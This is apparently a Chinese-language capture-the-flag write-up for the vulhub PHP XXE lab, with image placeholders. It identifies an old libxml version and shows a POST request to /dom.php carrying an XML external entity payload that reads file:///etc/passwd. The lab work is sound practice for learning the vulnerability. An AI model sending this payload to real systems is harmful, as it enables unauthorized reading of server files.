https://github.com/vulhub/vulhub/tree/master/php/php_xxe
    image.png
    打开题目链接为 phpinfo信息页面
    image.png
    搜索 libxml版本,获取版本为 2.80,libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。
    image.png
    发送请求包

    1. POST /dom.php
    3. <?xml version="1.0" encoding="utf-8"?> 
    4. <!DOCTYPE xxe [
    5. <!ELEMENT name ANY >
    6. <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
    7. <root>
    8. <name>&xxe;</name>
    9. </root>

    image.png
    flag在 phpinfo中
    image.png